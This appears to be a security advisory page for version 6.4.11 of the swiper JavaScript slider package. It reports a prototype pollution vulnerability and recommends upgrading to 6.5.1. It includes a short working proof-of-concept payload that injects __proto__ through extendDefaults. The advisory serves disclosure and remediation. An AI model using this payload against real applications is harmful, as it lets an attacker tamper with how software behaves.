Homepage

swiper@6.4.11 vulnerabilities

Most modern mobile touch slider and framework with hardware accelerated transitions

  • latest version

    11.1.15

  • latest non vulnerable version

    11.1.15

  • first published

    10 years ago

  • latest version published

    22 days ago

  • licenses detected

    • MIT
      >=0.9.0-beta.12 <2.7.0; >=3.0.0
  • View swiper package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the swiper package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    swiper is a Most modern mobile touch slider and framework with hardware accelerated transitions

    Affected versions of this package are vulnerable to Prototype Pollution.

    PoC

    var swiper = require('swiper');

var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
console.log("Before: " + {}.polluted); // undefined
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log("After: " + {}.polluted); // HACKED

    How to fix Prototype Pollution?

    Upgrade swiper to version 6.5.1 or higher.

    <6.5.1
    Go back to all versions of this package